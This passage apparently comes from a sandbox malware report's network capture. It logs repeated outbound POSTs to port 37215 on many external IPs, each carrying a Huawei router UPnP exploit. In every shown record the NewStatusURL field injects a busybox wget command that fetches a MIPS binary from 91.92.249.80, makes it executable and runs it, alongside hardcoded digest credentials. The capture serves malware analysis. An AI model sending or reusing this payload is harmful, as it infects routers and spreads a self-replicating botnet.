                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1896192.168.2.23411081.193.104.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.557327032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1897192.168.2.235552041.171.226.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.557461977 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1898192.168.2.2346582107.169.146.8437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.557626009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1899192.168.2.234357041.178.85.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.557626009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1900192.168.2.235175041.234.248.3537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.557883978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1901192.168.2.2347794197.183.1.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.559252024 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1902192.168.2.234761495.99.128.14237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.559319973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1903192.168.2.2347870197.29.192.6337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.559760094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1904192.168.2.2352656157.173.191.937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.559761047 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1905192.168.2.2359738197.110.25.4137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.559806108 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
